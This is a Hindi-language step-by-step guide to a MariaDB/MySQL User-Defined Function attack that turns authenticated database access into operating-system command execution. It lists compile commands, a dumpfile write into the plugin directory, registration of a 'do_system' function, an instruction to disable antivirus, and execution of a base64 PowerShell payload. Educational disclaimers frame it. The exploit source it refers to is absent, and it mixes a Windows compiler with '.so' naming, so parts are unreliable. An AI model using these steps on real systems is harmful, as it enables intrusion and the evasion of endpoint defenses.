
Database authenticated code execution
यह मार्गदर्शिका डेटाबेस सिस्टम पर User-Defined Function (UDF) हमले को पुनरुत्पादित करने के लिए चरण-दर-चरण निर्देश प्रदान करती है। कृपया ध्यान दें कि यह शोषण कुछ सिस्टम पर काम कर सकता है, लेकिन यह 64-बिट आर्किटेक्चर या कुछ बिल्ड पर सही ढंग से कार्य नहीं कर सकता है।
चेतावनी: यह केवल शैक्षिक उद्देश्यों के लिए है। इन तकनीकों का अनधिकृत उपयोग गैरकानूनी और अनैतिक है।
सबसे पहले, exploit.c नामक एक फ़ाइल बनाएं और निम्नलिखित कोड जोड़ें:
शोषण कोड को x86_64-w64-mingw32-gcc कंपाइलर का उपयोग करके संकलित करें:
x86_64-w64-mingw32-gcc -g -c exploit.c
संकलित ऑब्जेक्ट फ़ाइल से एक साझा ऑब्जेक्ट फ़ाइल (exploit.so) उत्पन्न करें:
x86_64-w64-mingw32-gcc -g -shared -Wl,-soname,exploit.so -o exploit.so exploit.o
.so फ़ाइल को हेक्साडेसिमल प्रारूप में बदलने के लिए xxd का उपयोग करें:
xxd -p exploit.so | tr -d '\n' > hex_value.txt
hex_value.txt से हेक्साडेसिमल मान कॉपी करें और अपने डेटाबेस में निम्नलिखित कमांड निष्पादित करें:
DB> set @shell = 0x<hex_value>;
चलाकर प्लगइन निर्देशिका खोजें:
DB> select @@plugin_dir;
फिर, प्लगइन निर्देशिका में शोषण साझा ऑब्जेक्ट बनाएं:
DB> select binary @shell into dumpfile 'C:\\Program Files\\MariaDB 11.1\\lib\\plugin\\exploit.so';
नोट: अपने सिस्टम कॉन्फ़िगरेशन या विशिष्ट प्लगइन निर्देशिका के अनुसार पथ को समायोजित करें।
शोषण का उपयोग करके डेटाबेस में एक नया फ़ंक्शन बनाएं:
DB> create function do_system returns integer soname 'exploit.so';
किसी भी एंटीवायरस या Windows Defender को अक्षम करें जो शोषण को अवरुद्ध कर सकता है। फिर, नवनिर्मित फ़ंक्शन का उपयोग करके एक कमांड चलाएं:
DB> select do_system('powershell base64 here');
'powershell base64 here' को उस कमांड के base64 एन्कोडेड पेलोड से बदलें जिसे आप निष्पादित करना चाहते हैं।
अस्वीकरण: यह दस्तावेज़ केवल शैक्षिक उद्देश्यों और सुरक्षा अनुसंधान के लिए है। इस जानकारी के दुरुपयोग से आपराधिक आरोप और गंभीर कानूनी दंड हो सकते हैं। किसी नेटवर्क या सिस्टम पर किसी भी कमजोरी का परीक्षण करने से पहले हमेशा संबंधित अधिकारियों से अनुमति प्राप्त करें।